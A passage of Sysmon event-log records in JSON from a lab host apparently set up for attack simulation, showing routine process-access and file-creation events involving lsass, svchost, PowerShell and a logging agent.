{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2666,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.035\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-00104EB90400}\r\nTargetProcessId: 4688\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.035","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-00104EB90400}","TargetProcessId":"4688","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2667,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.050\r\nProcessGuid: {E2A3D6B1-1090-5F25-0000-00104EB90400}\r\nProcessId: 4688\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_qoq4fndo.4uo.ps1\r\nCreationUtcTime: 2020-08-01 06:49:52.050","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.050","ProcessGuid":"{E2A3D6B1-1090-5F25-0000-00104EB90400}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_qoq4fndo.4uo.ps1","CreationUtcTime":"2020-08-01 06:49:52.050","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2668,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.082\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-00104EB90400}\r\nTargetProcessId: 4688\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.082","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-00104EB90400}","TargetProcessId":"4688","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2669,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.082\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-00104EB90400}\r\nTargetProcessId: 4688\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.082","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-00104EB90400}","TargetProcessId":"4688","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2670,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.129\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.129","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2671,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.239\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.239","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2672,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2673,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2674,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.301\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 